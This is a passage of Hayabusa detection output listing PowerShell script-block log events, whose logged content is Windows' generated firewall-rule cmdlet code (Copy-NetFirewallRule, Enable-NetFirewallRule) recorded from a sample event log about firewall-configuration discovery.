$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetFirewallRule' function Enable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreS",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.582 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MS",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.582 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"FT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { 